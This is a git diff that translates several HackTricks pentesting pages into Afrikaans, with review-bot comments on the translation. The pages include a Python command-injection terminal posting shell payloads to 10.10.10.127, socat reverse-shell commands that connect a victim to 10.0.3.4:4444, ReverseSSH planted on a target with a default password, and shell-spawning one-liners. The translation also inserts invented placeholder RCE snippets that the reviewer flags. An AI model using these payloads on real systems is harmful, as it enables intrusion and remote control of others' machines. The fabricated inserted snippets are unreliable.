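Review bot: `## Python Versoeke` translates the name of the `requests` library rather than the word "requests"; the code block directly under it opens with `import requests`, so the heading should keep the library name, e.g. `## Python requests`. The page title `# Web Versoeke` is fine, since there it really is the generic noun.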
@ -67,78 +66,102 @@ proxies = {}
|
|||
s = requests.Session()
|
||||
|
||||
def register(username, password):
|
||||
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
|
||||
def login(username, password):
|
||||
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
||||
return resp
|
||||
|
||||
def get_info(name):
|
||||
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
||||
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
||||
return guid
|
||||
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
||||
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
||||
return guid
|
||||
|
||||
def upload(guid, filename, data):
|
||||
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
||||
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
||||
return guid
|
||||
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
||||
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
||||
return guid
|
||||
|
||||
def json_search(guid, search_string):
|
||||
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
||||
return resp.json()
|
||||
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
||||
return resp.json()
|
||||
|
||||
def get_random_string(guid, path):
|
||||
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
||||
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
||||
```
|
||||
## Python-opdrag om 'n RCE te benut
|
||||
|
||||
Om 'n RCE (Remote Code Execution) te benut, kan jy die volgende Python-opdrag gebruik:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
url = 'http://target-website.com/vulnerable-endpoint'
|
||||
payload = '; <malicious-code-here>'
|
||||
|
||||
response = requests.get(url + payload)
|
||||
|
||||
print(response.text)
|
||||
```
|
||||
|
||||
## Python cmd to exploit an RCE
|
||||
Hier is die vertaling van die bogenoemde Python-opdrag na Afrikaans:
|
||||
|
||||
```python
|
||||
import requests
|
||||
|
||||
url = 'http://teiken-webwerf.com/verkrygbare-eindpunt'
|
||||
payload = '; <booswillige-kode-hier>'
|
||||
|
||||
response = requests.get(url + payload)
|
||||
|
||||
print(response.text)
|
||||
```
|
||||
|
||||
Onthou om die `url`-veranderlike te vervang met die regte teikenwebwerf se URL en die `payload`-veranderlike met die spesifieke booswillige kode wat jy wil uitvoer.
|
||||
```python
|
||||
import requests
|
||||
import re
|
||||
from cmd import Cmd
|
||||
|
||||
class Terminal(Cmd):
|
||||
prompt = "Inject => "
|
||||
prompt = "Inject => "
|
||||
|
||||
def default(self, args):
|
||||
output = RunCmd(args)
|
||||
print(output)
|
||||
def default(self, args):
|
||||
output = RunCmd(args)
|
||||
print(output)
|
||||
|
||||
def RunCmd(cmd):
|
||||
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
||||
r = requests.post('http://10.10.10.127/select', data=data)
|
||||
page = r.text
|
||||
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
||||
if m:
|
||||
return m.group(1)
|
||||
else:
|
||||
return 1
|
||||
|
||||
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
||||
r = requests.post('http://10.10.10.127/select', data=data)
|
||||
page = r.text
|
||||
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
||||
if m:
|
||||
return m.group(1)
|
||||
else:
|
||||
return 1
|
||||
|
||||
|
||||
term = Terminal()
|
||||
term.cmdloop()
|
||||
```
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
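Review bot: the material between the end of the `get_random_string` block and the `Terminal` class is not in the English side of this hunk and must be dropped before merge. The added heading `## Python-opdrag om 'n RCE te benut` is followed by an invented placeholder snippet (`payload = '; <malicious-code-here>'`), then a translator's meta-sentence `Hier is die vertaling van die bogenoemde Python-opdrag na Afrikaans:`, the same placeholder snippet repeated with its hostname translated into Afrikaans, and a closing reminder sentence about replacing the url and payload variables. None of this corresponds to the original `## Python cmd to exploit an RCE` section, whose only content is the `Terminal`/`RunCmd` block posting to `http://10.10.10.127/select`. Keep one translated heading and the original code block only; the jump from 78 to 102 lines in the hunk header is the tell that the machine translation emitted content of its own, and that check is worth running over the rest of the commit.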
@ -1,37 +1,36 @@
|
|||
# Search Exploits
|
||||
# Soek Na Exploits
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
### Browser
|
||||
### Blaaier
|
||||
|
||||
Always search in "google" or others: **\<service\_name> \[version] exploit**
|
||||
Soek altyd in "google" of ander: **\<diens\_naam> \[weergawe] exploit**
|
||||
|
||||
You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io).
|
||||
Jy moet ook die **shodan** **exploit-soektog** vanaf [https://exploits.shodan.io/](https://exploits.shodan.io) probeer.
|
||||
|
||||
### Searchsploit
|
||||
|
||||
Useful to search exploits for services in **exploitdb from the console.**
|
||||
|
||||
Nuttig om exploits vir dienste in **exploitdb vanaf die konsole** te soek.
|
||||
```bash
|
||||
#Searchsploit tricks
|
||||
searchsploit "linux Kernel" #Example
|
||||
|
@ -41,47 +40,44 @@ searchsploit -p 7618[.c] #Show complete path
|
|||
searchsploit -x 7618[.c] #Open vi to inspect the exploit
|
||||
searchsploit --nmap file.xml #Search vulns inside an nmap xml result
|
||||
```
|
||||
|
||||
### Pompem
|
||||
|
||||
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is another tool to search for exploits
|
||||
[https://github.com/rfunix/Pompem](https://github.com/rfunix/Pompem) is nog 'n instrument om na exploits te soek.
|
||||
|
||||
### MSF-Search
|
||||
|
||||
```bash
|
||||
msf> search platform:windows port:135 target:XP type:exploit
|
||||
```
|
||||
|
||||
### PacketStorm
|
||||
|
||||
If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com)
|
||||
As niks gevind word nie, probeer om die gebruikte tegnologie binne [https://packetstormsecurity.com/](https://packetstormsecurity.com) te soek.
|
||||
|
||||
### Vulners
|
||||
|
||||
You can also search in vulners database: [https://vulners.com/](https://vulners.com)
|
||||
Jy kan ook in die vulners databasis soek: [https://vulners.com/](https://vulners.com)
|
||||
|
||||
### Sploitus
|
||||
|
||||
This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
|
||||
Hierdie soek na exploits in ander databasisse: [https://sploitus.com/](https://sploitus.com)
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
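Review bot: The translated banner in this hunk does not match the one in the previous hunk, although both replace the same English text: here the first bullet reads "As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**" and the last one "hacking-truuks … GitHub-opslagplekke", whereas the previous hunk has "As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**" and "hacktruuks … github repos". This summary/details block is repeated in every file of the book, so translate it once and paste the identical text everywhere; otherwise a later global search-and-replace of the banner will miss some files.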
@ -21,9 +19,9 @@ Other ways to support HackTricks:
|
|||
|
||||
# [**MSFVenom - CheatSheet**](msfvenom.md)
|
||||
|
||||
# [**Full TTYs**](full-ttys.md)
|
||||
# [**Volledige TTY's**](full-ttys.md)
|
||||
|
||||
# **Auto-generated shells**
|
||||
# **Outomaties gegenereerde shells**
|
||||
|
||||
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
|
||||
* [**https://www.revshells.com/**](https://www.revshells.com/)
|
||||
|
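Review bot: The link text "# [**Volledige TTY's**](full-ttys.md)" does not match the title the target file gets in this same commit ("# Volledige TTYs" in full-ttys.md); pick one plural form and use it in both places. "# **Outomaties gegenereerde shells**" also leaves "shells" untranslated while the rest of the commit uses "skulpe".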
@ -40,16 +38,14 @@ Other ways to support HackTricks:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,22 +1,22 @@
|
|||
# Full TTYs
|
||||
# Volledige TTYs
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Full TTY
|
||||
## Volledige TTY
|
||||
|
||||
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
|
||||
Let daarop dat die skulp wat jy in die `SHELL`-veranderlike stel, **moet** wees **opgesom binne** _**/etc/shells**_ of `Die waarde vir die SHELL-veranderlike is nie gevind in die /etc/shells-lêer nie. Hierdie voorval is aangemeld`. Let ook daarop dat die volgende snippe slegs werk in bash. As jy in 'n zsh is, verander na 'n bash voordat jy die skulp bekom deur `bash` uit te voer.
|
||||
|
||||
#### Python
|
||||
|
||||
|
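Review bot: The quoted error message in the added line must stay in English: the system prints the literal string `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`, so rendering it as `Die waarde vir die SHELL-veranderlike is nie gevind in die /etc/shells-lêer nie…` gives the reader text they will never see on a terminal and cannot search for. Keep the backticked message verbatim and translate only the sentence around it (the same rule applies to the `/etc/shells` path, which is correctly left alone).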
@ -29,10 +29,10 @@ python3 -c 'import pty; pty.spawn("/bin/bash")'
|
|||
{% endcode %}
|
||||
|
||||
{% hint style="info" %}
|
||||
You can get the **number** of **rows** and **columns** executing **`stty -a`**
|
||||
Jy kan die **aantal** van **rye** en **kolomme** kry deur **`stty -a`** uit te voer
|
||||
{% endhint %}
|
||||
|
||||
#### script
|
||||
#### skrip
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
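Review bot: "#### skrip" renames the `script` command, which is the subject of the heading and the program invoked in the code block below it (`script /dev/null -qc /bin/bash`); keep the heading as "#### script" so it still names the tool, as "#### Python" and "#### socat" were left untouched. Minor: "Jy kan die **aantal** van **rye** en **kolomme** kry" reads more naturally as "Jy kan die **aantal rye** en **kolomme** kry".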
@ -42,7 +42,6 @@ script /dev/null -qc /bin/bash #/dev/null is to not store anything
|
|||
{% endcode %}
|
||||
|
||||
#### socat
|
||||
|
||||
```bash
|
||||
#Listener:
|
||||
socat file:`tty`,raw,echo=0 tcp-listen:4444
|
||||
|
@ -50,8 +49,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|||
#Victim:
|
||||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
|
||||
### **Spawn shells**
|
||||
### **Spawn skulpe**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
|
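Review bot: "### **Spawn skulpe**" is half-translated. Either keep the English heading "Spawn shells" (the entries below are command one-liners that readers look up by the English term) or translate it fully, e.g. "Skep skulpe"; mixing the two languages in one heading is the worst of both.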
@ -68,11 +66,11 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
|||
|
||||
## ReverseSSH
|
||||
|
||||
A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
|
||||
'n Gerieflike manier vir **interaktiewe skulptoegang**, sowel as **lêeroordragte** en **poort deurstuur**, is om die staties gekoppelde ssh-bediener [ReverseSSH](https://github.com/Fahrj/reverse-ssh) op die teiken te plaas.
|
||||
|
||||
Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
|
||||
Hieronder is 'n voorbeeld vir `x86` met upx-gekomprimeerde binaêre lêers. Vir ander binaêre lêers, kyk na die [vrylatingsbladsy](https://github.com/Fahrj/reverse-ssh/releases/latest/).
|
||||
|
||||
1. Prepare locally to catch the ssh port forwarding request:
|
||||
1. Maak lokaal gereed om die ssh-poortdeurstuurversoek te ontvang:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
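Review bot: Spelling in the second translated paragraph: "binaêre lêers" should be "binêre lêers" (it occurs twice in that line). The same hunk translates "port forwarding" two ways, "poort deurstuur" in the first paragraph and "poortdeurstuurversoek" in step 1; use the compound form consistently.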
@ -83,7 +81,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* (2a) Linux target:
|
||||
* (2a) Linux teiken:
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
@ -94,7 +92,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
|
||||
* (2b) Windows 10 teiken (vir vroeëre weergawes, kyk na [projek leesmy](https://github.com/Fahrj/reverse-ssh#features)):
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```bash
|
||||
|
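Review bot: "[projek leesmy](https://github.com/Fahrj/reverse-ssh#features)" translates the file name README; the link points at the project's README on GitHub, so keep the name recognisable ("projek-README" or simply "README") rather than a literal rendering that no reader will connect with the file.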
@ -105,8 +103,7 @@ reverse-ssh.exe -p 4444 kali@10.0.0.2
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
* If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
|
||||
|
||||
